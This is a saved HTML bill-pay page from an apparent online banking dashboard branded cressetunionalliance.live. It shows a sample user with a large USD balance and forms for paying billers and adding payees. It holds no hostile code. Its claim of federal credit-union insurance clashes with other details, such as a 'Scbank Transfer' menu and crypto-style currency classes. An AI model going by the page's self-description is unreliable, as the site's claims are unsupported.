
    <!DOCTYPE html>
    <html lang="en-US" class="js">
        <head>
        <meta charset="utf-8">
        <meta name="author" content="Smart">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="description" content="cressetunionalliance.live is federally insured by the National Credit Union Administration. We do business in accordance with the Fair Housing Law and Equal opportunity Credit Act.">
        <!-- Fav Icon  -->
        <link rel="shortcut icon" href="../images/favicon.png">
        <!-- Page Title  -->
        <title>Bryte David Shine | cressetunionalliance.live Online banking</title>
        <!-- StyleSheets  -->
        <link rel="stylesheet" href="../scss/sweetalert.css">
        <link rel="stylesheet" href="../assets/css/dashlite.css?ver=2.4.0">
        <link id="skin-default" rel="stylesheet" href="../assets/css/theme.css?ver=2.4.0">
         <link rel="stylesheet" type="text/css" href="../assets/css/libs/fontawesome-icons.css"> 
         <link href="../css/toastr.css" rel="stylesheet"/>
       </head>
        <link rel="stylesheet" href="https://www.jqueryscript.net/demo/jQuery-International-Telephone-Input-With-Flags-Dial-Codes/build/css/intlTelInput.css">
       <script type="text/javascript">
    function googleTranslateElementInit() {
      new google.translate.TranslateElement({pageLanguage: 'en', layout: google.translate.TranslateElement.InlineLayout.SIMPLE}, 'google_translate_element');
    }
    </script>
    <script type="text/javascript" src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
        <style>
    .goog-te-gadget-simple {
    border:none;
    }
    .goog-te-gadget-simple a {
    color:#000;
    }
    </style>
    <style type="text/css">
        .btn-primary{
            background-color: #3140fc;
        }
        .btn-secondary{
            background-color: #d13636;
        }
        .btn-secondary:hover{opacity: 0.6;}
        .btn-primary:hover{opacity: 0.6;}
    </style>
    <body class="nk-body npc-crypto bg-white has-sidebar dark-mode ">
        <div class="nk-app-root">
            <!-- main @s -->
            <div class="nk-main ">
                <!-- sidebar @s -->
                <div class="nk-sidebar nk-sidebar-fixed " data-content="sidebarMenu">
                    <div class="nk-sidebar-element nk-sidebar-head"  style="border-bottom: solid #fe473a;">
                        <div class="nk-sidebar-brand" >
                            <a href="dashboard" class="logo-link nk-sidebar-logo">
                                <img class="logo-light logo-img" src="../logo.png" srcset="../logo.png 2x" alt="logo">
                                <img class="logo-dark logo-img" src="../logo.png" srcset="../logo.png 2x" alt="logo-dark">
                                
                            </a>
                        </div>
                        <div class="nk-menu-trigger mr-n2">
                            <a href="#" class="nk-nav-toggle nk-quick-nav-icon d-xl-none" data-target="sidebarMenu"><em class="icon ni ni-arrow-left"></em></a>
                        </div>
                    </div><!-- .nk-sidebar-element -->
                    <div class="nk-sidebar-element">
                        <div class="nk-sidebar-body" data-simplebar>
                            <div class="nk-sidebar-content">
                                <div class="nk-sidebar-widget d-none d-xl-block">
                                    <div class="user-account-info between-center">
                                        <div class="user-account-main">
                                            <h6 class="overline-title-alt">Available Balance</h6>
                                            <div class="user-balance">    2,201,610 <small class="currency currency-btc">USD</small></div>
                                            <div class="user-balance-alt">2,201,610 <span class="currency currency-btc">USD</span></div>
                                        </div>
                                        <a href="#" class="btn btn-white btn-icon btn-light"><em class="icon ni ni-line-chart"></em></a>
                                    </div>
                                    <ul class="user-account-data gy-1">
                                        <li>
                                            <div class="user-account-label">
                                                <span class="sub-text">Income</span>
                                            </div>
                                            <div class="user-account-value">
    
                                                <span class="text-success ml-2">75 %<em class="icon ni ni-arrow-long-up"></em></span>
                                            </div>
                                        </li>
                                        <li>
                                            <div class="user-account-label">
                                                <span class="sub-text">Debits</span>
                                            </div>
                                            <div class="user-account-value">
                                               <span class="text-danger ml-2">25 %<em class="icon ni ni-arrow-long-down"></em></span>
                                            </div>
                                        </li>
                                    </ul>
                                    <div class="user-account-actions">
                                        <ul class="g-3">
                                            <li><a href="transfer" class="btn btn-lg btn-primary"><span><i class="fas fa-money-bill-alt"></i> Transfer</span></a></li>
                                            <li><a href="pay-bills" class="btn btn-lg btn-secondary"><span><i class="fas fa-file-invoice-dollar"></i> Pay Bills</span></a></li>
                                        </ul>
                                    </div>
                                </div><!-- .nk-sidebar-widget -->
                                <div class="nk-sidebar-widget nk-sidebar-widget-full d-xl-none pt-0">
                                    <a class="nk-profile-toggle toggle-expand" data-target="sidebarProfile" href="#">
                                        <div class="user-card-wrap">
                                            <div class="user-card">
                                                <div class="user-avatar">
                                                    <span>BD</span>
                                                </div>
                                                <div class="user-info">
                                                    <span class="lead-text">Bryte Shine David</span>
                                                    <span class="sub-text">0987654321</span>
                                                </div>
                                                <div class="user-action">
                                                    <em class="icon ni ni-chevron-down"></em>
                                                </div>
                                            </div>
                                        </div>
                                    </a>
                                    <div class="nk-profile-content toggle-expand-content" data-content="sidebarProfile">
                                        <div class="user-account-info between-center">
                                            <div class="user-account-main">
                                                <h6 class="overline-title-alt">Available Balance</h6>
                                                <div class="user-balance">    2,201,610<small class="currency currency-btc">USD</small></div>
                                                <div class="user-balance-alt">2201610.34 <span class="currency currency-btc">USD</span></div>
                                            </div>
                                            <a href="#" class="btn btn-icon btn-light"><em class="icon ni ni-line-chart"></em></a>
                                        </div>
                                        <ul class="user-account-data">
                                            <li>
                                                <div class="user-account-label">
                                                    <span class="sub-text">income</span>
                                                </div>
                                                <div class="user-account-value">
                                                
                                                    <span class="text-success ml-2">75 %<em class="icon ni ni-arrow-long-up"></em></span>
                                                </div>
                                            </li>
                                            <li>
                                                <div class="user-account-label">
                                                    <span class="sub-text">Debits</span>
                                                </div>
                                                <div class="user-account-value">
                                                   
                                                    <span class="text-danger ml-2">25 %<em class="icon ni ni-arrow-long-up"></em></span>
                                                </div>
                                            </li>
                                        </ul>
                                        <ul class="user-account-links">
                                            <li><a href="transfer.php" class="link"><span> Transfer Funds</span> <em class="icon ni ni-wallet-out"></em></a></li>
                                            <li><a href="authenticate" class="link"><span>Pay Bills</span> <em class="icon ni ni-wallet-in"></em></a></li>
                                        </ul>
                                        <ul class="link-list">
                                            <li><a href="profile"><em class="icon ni ni-user-alt"></em><span>View Profile</span></a></li>
                                            <li><a href="account-setting"><em class="icon ni ni-setting-alt"></em><span>Account Setting</span></a></li>
                                            <li><a href="activity-logs"><em class="icon ni ni-activity-alt"></em><span>Login Activity</span></a></li>
                                        </ul>
                                        <ul class="link-list">
                                            <li><a href="logout"><em class="icon ni ni-signout"></em><span>Sign out</span></a></li>
                                        </ul>
                                    </div>
                                </div><!-- .nk-sidebar-widget -->
                                <div class="nk-sidebar-menu">
                                    <!-- Menu -->
                                    <ul class="nk-menu">
                                        <li class="nk-menu-heading">
                                            <h6 class="overline-title">Menu</h6>
                                        </li>
                                        <li class="nk-menu-item">
                                            <a href="dashboard" class="nk-menu-link">
                                                <span class="nk-menu-icon"><em class="icon ni ni-dashboard"></em></span>
                                                <span class="nk-menu-text">Dashboard</span>
                                            </a>
                                        </li>
                                        <li class="nk-menu-item">
                                            <a href="myaccount" class="nk-menu-link">
                                                <span class="nk-menu-icon"><em class="icon ni ni-user-c"></em></span>
                                                <span class="nk-menu-text">My Account</span>
                                            </a>
                                        </li>
                                        <li class="nk-menu-item">
                                            <a href="summary" class="nk-menu-link">
                                                <span class="nk-menu-icon"><em class="icon ni ni-report-profit"></em></span>
                                                <span class="nk-menu-text">Account summary</span>
                                            </a>
                                        </li>
                                          <li class="nk-menu-item has-sub">
                                            <a href="#" class="nk-menu-link nk-menu-toggle">
                                                <span class="nk-menu-icon"><em class="icon ni ni-wallet-out"></em></span>
                                                <span class="nk-menu-text">Send Money</span>
                                            </a>
                                            <ul class="nk-menu-sub">
                                                <li class="nk-menu-item">
                                                    <a href="local_transfer" class="nk-menu-link"><span class="nk-menu-text">Scbank Transfer</span></a>
                                                </li>
                                                <li class="nk-menu-item">
                                                    <a href="transfer" class="nk-menu-link"><span class="nk-menu-text">Other bank transfer</span></a>
                                                </li>
                                                <li class="nk-menu-item">
                                                    <a href="wire" class="nk-menu-link"><span class="nk-menu-text">Cross-border transfer</span></a>
                                                </li>
                                            </ul><!-- .nk-menu-sub -->
                                        </li><!-- .nk-menu-item -->
                                           <li class="nk-menu-item">
                                            <a href="wire" class="nk-menu-link">
                                                <span class="nk-menu-icon"><em class="icon ni ni-money"></em></span>
                                                <span class="nk-menu-text">Cross-border Transfer</span>
                                            </a>
                                        </li>
                                        <li class="nk-menu-item">
                                            <a href="check-deposit" class="nk-menu-link">
                                                <span class="nk-menu-icon"><em class="icon ni ni-wallet-in"></em></span>
                                                <span class="nk-menu-text">Deposit Check</span>
                                            </a>
                                        </li>
                                        <li class="nk-menu-item">
                                            <a href="pay-bills" class="nk-menu-link">
                                                <span class="nk-menu-icon"><em class="icon ni ni-cc-secure"></em></span>
                                                <span class="nk-menu-text">Pay Bills</span>
                                            </a>
                                        </li>
                                                                             <li class="nk-menu-item">
                                            <a href="visual-card" class="nk-menu-link">
                                                <span class="nk-menu-icon"><em class="icon ni ni-cc-alt2-fill"></em></span>
                                                <span class="nk-menu-text">Virtual Cards</span>
                                            </a>
                                        </li>
                                                                                                               <li class="nk-menu-item has-sub">
                                            <a href="#" class="nk-menu-link bg-primary text-light nk-menu-toggle">
                                                <span class="nk-menu-icon"><em class="icon ni ni-bitcoin"></em></span>
                                                <span class="nk-menu-text">Crypto Currency</span>
                                            </a>
                                            <ul class="nk-menu-sub">
                                                <li class="nk-menu-item">
                                                    <a href="crypto" class="nk-menu-link"><span class="nk-menu-text">Manage Assets</span></a>
                                                </li>
                                                <li class="nk-menu-item">
                                                    <a href="crypto?action=deposit" class="nk-menu-link"><span class="nk-menu-text">Deposit Crypto</span></a>
                                                </li>
                                                <li class="nk-menu-item">
                                                    <a href="crypto?action=withdraw" class="nk-menu-link"><span class="nk-menu-text">Fiat Withdrawal</span></a>
                                                </li>
                                            </ul><!-- .nk-menu-sub -->
                                        </li><!-- .nk-menu-item -->
                                                                                 
                                                                         <li class="nk-menu-item">
                                            <a href="kyc" class="nk-menu-link">
                                                <span class="nk-menu-icon"><em class="icon ni ni-file-check-fill"></em></span>
                                                <span class="nk-menu-text">KYC Status</span>
                                            </a>
                                        </li>
                                                                                                                  <li class="nk-menu-item">
                                            <a href="loan" class="nk-menu-link">
                                                <span class="nk-menu-icon"><em class="icon ni ni-invest"></em></span>
                                                <span class="nk-menu-text">Loan/Credit financing </span>
                                            </a>
                                        </li>
                                                                              <li class="nk-menu-item">
                                            <a href="account-setting" class="nk-menu-link">
                                                <span class="nk-menu-icon"><em class="icon ni ni-setting-alt-fill"></em></span>
                                                <span class="nk-menu-text">Account Setting</span>
                                            </a>
                                        </li>
                                         <li class="nk-menu-item">
                                            <a href="contact" class="nk-menu-link">
                                                <span class="nk-menu-icon"><em class="icon ni ni-help-alt"></em></span>
                                                <span class="nk-menu-text">Support</span>
                                            </a>
                                        </li>
                                    </ul><!-- .nk-menu -->
                                </div><!-- .nk-sidebar-menu -->
                              
                                <div class="nk-sidebar-footer">
                                    <ul class="nk-menu nk-menu-footer">
                                       
                                <a href="#" style=""><div id="google_translate_element"></div> </a>
                                      
                                    </ul><!-- .nk-footer-menu -->
                                </div><!-- .nk-sidebar-footer -->
                            </div><!-- .nk-sidebar-content -->
                        </div><!-- .nk-sidebar-body -->
                    </div><!-- .nk-sidebar-element -->
                </div>
                <!-- sidebar @e -->
                <!-- wrap @s -->
                <div class="nk-wrap ">
                    <!-- main header @s -->
                    <div class="nk-header nk-header-fluid nk-header-fixed is-secondary">
                        <div class="container-fluid">
                            <div class="nk-header-wrap">
                                <div class="nk-menu-trigger d-xl-none ml-n1">
                                    <a href="#" class="nk-nav-toggle nk-quick-nav-icon" data-target="sidebarMenu"><em class="icon ni ni-menu"></em></a>
                                </div>
                                <div class="nk-header-brand d-xl-none">
                                    <a href="#" class="logo-link">
                                        <img class="logo-light logo-img" src="../logo.png" srcset="../logo.png" alt="logo">
                                        <img class="logo-dark logo-img" src="../logo.png" srcset="../logo.png" alt="logo-dark">
      
                                    </a>
                                </div>
                                <div class="nk-header-news d-none d-xl-block">
                                    <div class="nk-news-list">
                                        <a class="nk-news-item" href="#">
                                            <div class="nk-news-icon">
                                                <em class="icon ni ni-card-view"></em>
                                            </div>
                                            <div class="nk-news-text">
                                                <p>Do you know the latest update of Covid 2019? <span> An overview of ours is now available here.</span></p>
                                                <em class="icon ni ni-external"></em>
                                            </div>
                                        </a>
                                    </div>
                                </div>
                                <div class="nk-header-tools">
                                    <ul class="nk-quick-nav">
                                        <li class="dropdown user-dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown">
                                                <div class="user-toggle">
                                                    <div class="user-avatar sm">
                                                        <em class="icon ni ni-user-alt"></em>
                                                    </div>
                                                    <div class="user-info d-none d-md-block">
                                                        <div class="user-status user-status-verified">Connected</div>
                                                        <div class="user-name dropdown-indicator">Bryte Shine David</div>
                                                    </div>
                                                </div>
                                            </a>
                                            <div class="dropdown-menu dropdown-menu-md dropdown-menu-right dropdown-menu-s1">
                                                <div class="dropdown-inner user-card-wrap bg-lighter d-none d-md-block">
                                                    <div class="user-card">
                                                        <div class="user-avatar">
                                                            <span>DB</span>
                                                        </div>
                                                        <div class="user-info">
                                                            <span class="lead-text">Bryte Shine David</span>
                                                            <span class="sub-text">0987654321</span>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="dropdown-inner user-account-info">
                                                    <h6 class="overline-title-alt">Savings Account</h6>
                                                    <div class="user-balance">    2,201,610 <small class="currency currency-btc">USD</small></div>
                                                    <div class="user-balance-sub">Local <span>2,201,610 <span class="currency currency-btc">USD</span></span></div>
                                                    <a href="transfer" class="link"><span>Transfer Funds</span> <em class="icon ni ni-wallet-out"></em></a>
                                                </div>
                                                <div class="dropdown-inner">
                                                    <ul class="link-list">
                                                        <li><a href="profile"><em class="icon ni ni-user-alt"></em><span>View Profile</span></a></li>
                                                        <li><a href="account-setting"><em class="icon ni ni-setting-alt"></em><span>Account Setting</span></a></li>
                                                        <li><a href="password-reset"><em class="icon ni ni-security"></em><span>Reset Password</span></a></li>
                                                        <li><a href="activity-logs"><em class="icon ni ni-activity-alt"></em><span>Login Activity</span></a></li>
                                             <li><a href="dark"><em class="icon ni ni-moon text-success"></em><span> Disable Dark mode</span></a></li>
                                             
                                                    </ul>
                                                </div>
                                                <div class="dropdown-inner">
                                                    <ul class="link-list">
                                                        <li><a href="logout"><em class="icon ni ni-signout"></em><span>Sign out</span></a></li>
                                                    </ul>
                                                </div>
                                            </div>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                   
                    <!-- main header @e -->    <div class="nk-content">
           <div class="container-xl wide-lg">
            <div class="nk-content-body">
            <div class="nk-block-head">
             <div class="nk-block-head-sub">
             </div>
               <div class="nk-block-between-md g-4 card-bordered">
                 <div class="nk-block-head-content">
                  <h4 class="nk-block-title fw-normal">Internet Banking Bill Pay.</h4>
                    <div class="nk-block-des">
                      <p>
                       </p>
                             </div>
                               </div>
                                    <div class="nk-block-head-content">
                                            <ul class="nk-block-tools gx-3">
                                                <li><a href="transfer" class="btn btn-secondary btn-light text-light"><span>Transfer Fund</span><em class="icon ni ni-wallet-out"></em></a></li>
                                            </ul>
    
                                        </div><!-- .nk-block-head-content -->
                                    </div><!-- .nk-block-between -->
                                </div><!-- .nk-block-head -->
                            </div>
                        </div>
    
         <div class="card card-bordered">
            <div class="card-header text-light" style="background-color:#3140fc;">
             <ul class="nav nav-tabs mt-n3">
               <li class="nav-item ">
                <a class="nav-link active text-light" data-toggle="tab" href="#tabItem5"><em class="icon ni ni-wallet-alt"></em> <span >Pay a Biller</span></a>
                </li>
            <li class="nav-item">
            <a class="nav-link text-light" data-toggle="tab" href="#tabItem6"><em class="icon ni ni-cc-new"></em><span>Add a Payee</span></a>
            </li>
           <li class="nav-item">
            <a class="nav-link text-light" data-toggle="tab" href="#tabItem7"><em class="icon ni ni-exchange"></em><span>History</span></a>
            </li>
            </ul>
       </div>
           <div class="card-inner">
         <div class="tab-content">
        <div class="tab-pane active" id="tabItem5">
    
        <p>
                                    <div class="buysell-field form-group">
                                <div class="form-label-group">
                                    <label class="form-label">Choose payment account</label>
                                </div>
                                   <input type="hidden" value="btc" name="bs-currency" id="buysell-choose-currency-modal">
                                <div class="dropdown buysell-cc-dropdown">
                                    <a href="#" class="buysell-cc-choosen dropdown-indicator" data-toggle="dropdown">
                                        <div class="coin-item coin-btc">
                                            <div class="coin-icon">
                                                <em class="icon ni ni-wallet-out"></em>
                                            </div>
                                            <div class="coin-info">
                                                <span class="coin-name">Savings Account</span>
                                                <span class="coin-text">Balance(USD2,201,610)</span>
                                            </div>
                                        </div>
                                    </a>
                                <div class="dropdown-menu dropdown-menu-auto dropdown-menu-mxh">
                                        <ul class="buysell-cc-list">
                                            <li class="buysell-cc-item selected">
                                                <a href="#" class="buysell-cc-opt" data-currency="btc">
                                                    <div class="coin-item coin-btc">
                                                        <div class="coin-icon">
                                                            <em class="icon ni ni-wallet-out"></em>
                                                        </div>
                                                        <div class="coin-info">
                                                            <span class="coin-name">Savings Account</span>
                                                            <span class="coin-text">0987*****</span>
                                                        </div>
                                                    </div>
                                                </a>
                                            </li> <!-- .buysell-cc-item -->
                                        </ul>
                                    </div>
                                </div><!-- .dropdown -->
                            </div><!-- .buysell-field -->
                            <form action="" method="post">
                            <div class="row">
                                
              <div class="form-group col-md-6">
            <div class="form-control-wrap">
             <select type="text" name="payeeid" class="form-control form-control-outlined" id="payeeid" placeholder="">
                <option disabled="" selected="">Select a payee</option>
                          <option value="19">Belema Fyneface</option>
    
                  </select>
             <label class="form-label-outlined" for="outlined">Select a payee</label>
             </div>
            </div> 
             <div class="form-group col-md-6">
            <div class="form-control-wrap">
             <input type="date" class="form-control form-control-outlined" id="dated" name="dated" placeholder="">
             <label class="form-label-outlined" for="outlined">Delivery date</label>
             </div>
            </div> 
            <div class="buysell-field form-group col-md-12"> 
           <div class="form-label-group"> 
               <label class="form-label" for="buysell-amount">Amount</label> 
           </div>
          <div class="form-control-group"> 
            <input type="number" class="form-control form-control-lg form-control-number" id="amount" name="amount" placeholder="2000"> 
            <div class="form-dropdown"> 
                <div class="text">USD<span></span></div> 
            </div>
             </div>
              <div class="form-note-group"> 
                  <span class="buysell-min form-note-alt"></span> <span class="buysell-rate form-note-alt">*Bill Pay fee will be deducted</span> 
              </div> 
              </div>
            <div class="form-group col-md-12">
            <div class="form-control-wrap">
             <input type="text" class="form-control form-control-outlined" id="memo" name="memo" placeholder="">
             <label class="form-label-outlined" for="outlined">Memo (optional)</label>
             </div>
            </div> 
            <div class="payBillResult"></div>
            <div class="form-group col-md-12"> 
                <button type="submit" class="btn btn-primary btn-block payBill" id="btn1">Continue</button>
            </div>
                             
             </div>
         </form>
                             </p>
         </div>
          <div class="tab-pane" id="tabItem6">
           <p>
               <form method="post" autocomplete="off" action=""><div class="row">
            <div class="form-group col-md-6">
            <div class="form-control-wrap">
             <input type="text" class="form-control form-control-outlined" id="name"  name="name">
             <label class="form-label-outlined" for="outlined">Payee name</label>
             </div>
            </div>
            <div class="form-group col-md-6">
            <div class="form-control-wrap">
             <select type="text" class="form-control form-control-outlined" id="method" name="method" placeholder="">
             <option>Paper Check</option>
             </select>
             <label class="form-label-outlined" for="outlined">Payment Delivery Method</label>
             </div>
            </div>
           <div class="form-group col-md-12">
            <div class="form-control-wrap">
             <input type="text" class="form-control form-control-outlined" id="account" name="account" >
             <label class="form-label-outlined" for="outlined">Account Number</label>
             <small>This is the account number that appears on your bills.  If you don't have account number, you can enter NA</small>
             </div>
            </div>
           <div class="form-group col-md-12">
            <div class="form-control-wrap">
             <input type="text" class="form-control form-control-outlined" id="address" name="address" >
             <label class="form-label-outlined" for="outlined">Address 1</label>
             <small>Enter the payment address that appears on your bill. We'll mail your payment to this address.</small>
             </div>
            </div>
            <div class="form-group col-md-12">
            <div class="form-control-wrap">
             <input type="text" class="form-control form-control-outlined" id="outlined" >
             <label class="form-label-outlined" for="outlined">Address 2</label>
             <small>Optional</small>
             </div>
            </div>
           <div class="form-group col-md-4">
            <div class="form-control-wrap">
             <input type="text" class="form-control form-control-outlined" id="city" name="city" >
             <label class="form-label-outlined" for="outlined">City</label>
             </div>
            </div>
                    <div class="form-group col-md-4">
            <div class="form-control-wrap">
             <input type="text" class="form-control form-control-outlined" id="state" name="state" >
             <label class="form-label-outlined" for="outlined">State</label>
             </div>
            </div>
            <div class="form-group col-md-4">
            <div class="form-control-wrap">
             <input type="text" class="form-control form-control-outlined" id="zipcode" name="zipcode" >
             <label class="form-label-outlined" for="outlined">Zip Code</label>
             </div>
            </div>
            <div class="form-group col-md-12">
            <div class="form-control-wrap">
             <input type="text" class="form-control form-control-outlined" id="nickname" name="nickname" >
             <label class="form-label-outlined" for="outlined">Nickname</label>
             <small>Optional Nickname are for your personal use only and will not appear on any of your payment.</small>
             </div>
            </div>
            <div class="form-group col-md-12">
            <div class="form-control-wrap">
             <div class="custom-control custom-control-sm custom-switch">
           <input type="checkbox" class="custom-control-input" id="customSwitch2">
            <label class="custom-control-label" for="customSwitch2">Add this Payee to your favorites</label>
           </div>
             </div>
            </div>
         <div class="addPayeeResult"></div>
        <div class="form-group col-md-12">
            <div class="form-control-wrap">
                <button  type="submit" class="btn btn-primary btn-block addPayee" id="btn2">continue</button>
            </div>
        </div>
            </div>
            </form>
         </p>
            </div>
           <div class="tab-pane" id="tabItem7">
            <p>
                <div class="card card-preview ">
                  <div class="card-inner p-0">
                    <table class="datatable-init table">
                      <thead>
                        <tr>
                         <th>Payee</th>
                           <th>Date</th>
                          <th>Amount</th>
                        <th>Status</th>
                      </tr>
                    </thead>
                     <tbody>
                                  </tbody>
          </table>
          </div>
      </div>
    </p>
    </div>
              </div>
            </div>
         </div>
       </div>
    <div class="nk-footer nk-footer-fluid">
                        <div class="container-fluid">
                            <div class="nk-footer-wrap">
                                <div class="nk-footer-copyright"> &copy; 2023 cressetunionalliance.live - <a href="#">All rights reserved.</a>
                                </div>
                                <div class="nk-footer-links">
                                    <ul class="nav nav-sm">
                                        <li class="nav-item"><a class="nav-link" href="#">Terms</a></li>
                                        <li class="nav-item"><a class="nav-link" href="privacy">Privacy</a></li>
                                        <li class="nav-item"><a class="nav-link" href="contact">Help</a></li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- footer @e -->
                </div>
                <!-- wrap @e -->
            </div>
            <!-- main @e -->
        </div>
        <!-- app-root @e -->
        <!-- JavaScript -->
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
        <script src="../js/country.js"></script>
        <script src="../assets/js/bundle.js?ver=2.4.0"></script>
        <script src="../assets/js/scripts.js?ver=2.4.0"></script>
        <script src="../assets/js/charts/chart-crypto.js?ver=2.4.0"></script>
        <script src="../js/sweetalert.js"></script>
       <script src="../assets/js/jquery.min.js"></script>
       <script src="../assets/js/custom.js"></script>
       <script src="../js/toastr.js"></script>
       
    </body>
    
    </html>